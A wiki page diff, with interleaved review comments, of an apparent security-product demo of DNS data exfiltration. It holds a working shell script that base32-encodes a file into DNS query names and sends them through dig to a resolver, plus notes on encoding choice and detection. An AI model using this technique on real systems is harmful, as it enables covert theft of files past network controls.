dns:dns_exfiltration

Differences

This shows you the differences between two versions of the page.

dns:dns_exfiltration [2023/10/02 13:59] bstafford
dns:dns_exfiltration [2023/11/29 15:02] (current) – [DNS Exfiltration Demo] bstafford
Line 1: Line 1:
 ===== DNS Exfiltration Demo ===== ===== DNS Exfiltration Demo =====
 [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]] [[https://hinty.io/devforth/dns-exfiltration-of-data-step-by-step-simple-guide/|Guide here]]
 +===== Base64 =====
 +Base64. Contains uppercase letters and defaults to allowing = and / etc. This is not recommended as it can make it easier to detect attacks as 'normal' DNS doesn't use these. Use Base32 instead.
 +
 +However, Base32 isn't available natively in many scripting toolsets. Base64 is. So some attackers use Base64 to avoid having to write their own Base32 conversion code.
 +
 +
  
  
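Review bot: the new Base64 section should give the concrete reason the extra characters stand out: '+', '/' and '=' are not legal hostname characters under RFC 1123, and DNS names are case-insensitive, so a resolver that lower-cases labels or applies 0x20 case randomisation can corrupt a case-sensitive Base64 payload, whereas Base32 (uppercase A-Z and digits 2-7 only) survives case folding. Stating this makes the detection advice precise: a query label containing '+', '/' or '=' is malformed for a hostname and is a reliable thing to alert on. Also, one of the two trailing blank lines after the second paragraph should be dropped.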
Line 7: Line 13:
  
 Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs. Note that this is actually two scripts as the last few commands are to be run on the DNS auth server to decrypt the logs.
-<code> +<code># File to be exfiltrated
-# File to be exfiltrated+
 SOURCE=/home/name/dns_exfil_test/file.pdf SOURCE=/home/name/dns_exfil_test/file.pdf
  
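Review bot: moving the first comment onto the opening tag ('<code># File to be exfiltrated') makes the wiki source harder to read and gains nothing; keep '<code>' on its own line, and consider '<code bash>' so the block is syntax-highlighted. Since the sentence above says this is really two scripts, splitting it into two code blocks (the sending side and the commands run on the authoritative server) would make that explicit instead of leaving the reader to find the boundary.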
Line 22: Line 27:
  
 # Target DNS server (e.g. NIOS with DFP or BloxOne Host) # Target DNS server (e.g. NIOS with DFP or BloxOne Host)
-LOCALDNS=192.168.11.154+# Public IP is the BloxOne Threat Defense IP address 
 +#LOCALDNS=192.168.11.154 
 +LOCALDNS=52.119.41.100
  
-# Log file that the DNS queries can be found in on the authoratative DNS server +# Log file that the DNS queries can be found in on the authoritative DNS server 
-BIND_LOG_FILE=/var/log/named/query.log]+BIND_LOG_FILE=/var/log/named/query.log
  
-# File to put the decrypted, received file into (should be a replicat of SOURCE)+# File to put the decrypted, received file into (should be a replica of SOURCE)
 DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf DECRYPTEDOUTPUT=/home/name/dns_exfil_test/file2.pdf
  
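Review bot: the two LOCALDNS values are now one live line and one commented-out line with no note on when each applies; the comment should say that 192.168.11.154 is presumably the on-premises NIOS/DFP target and 52.119.41.100 the BloxOne Threat Defense public resolver, and the trailing spaces on the 'Public IP' and 'Log file' comment lines should be removed. For BIND_LOG_FILE, add a comment that the path only has content if query logging is enabled on the authoritative server (a 'queries' logging channel in named.conf, or 'rndc querylog' switched on); otherwise the decode step at the end reads an empty file and the failure is confusing. The removal of the stray ']' after query.log and the authoritative/replica spelling fixes are correct.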
Line 39: Line 46:
 base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED base32 $SOURCE | tr -d '\n' | fold -62 | sed -e "s/$/.$SUBDOM.$DOMAIN/" | nl | sed s/^' '*//g | sed "s/\\t/./g" > $ENCRYPTED
  
-# The result is a file that contains a hugh list of FQDN's for us to query (exfiltrate)+# The result is a file that contains a huge list of FQDN's for us to query (exfiltrate)
  
-Use DIG to iterate over the file and resolve the DNS at full speed.+Exfiltrate the file with DIG.
 dig +short A @$LOCALDNS -f $ENCRYPTED dig +short A @$LOCALDNS -f $ENCRYPTED
- 
-# OR - if you want to add a delay into the exfiltration, use the following line. 
-# for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep ;done 
  
  
 +# Delay if required.
 +#for i in $(cat $ENCRYPTED); do dig +short A @$LOCALDNS $i;sleep 0.1 ;done
  
  
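Review bot: the line 'Exfiltrate the file with DIG.' (like the 'Use DIG to iterate over the file ...' line it replaces) is bare prose inside the code block with no leading '#', so anyone pasting the block into a shell will get a command-not-found error for 'Exfiltrate'; prefix it with '#'. The delay loop itself is an improvement (the old 'sleep ;' had no argument and would fail), but moving it below two blank lines detaches it from the dig line it is an alternative to; keep it directly under that line with the original 'OR' wording so the reader sees the two options together.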
dns/dns_exfiltration.1696255155.txt.gz · Last modified: by bstafford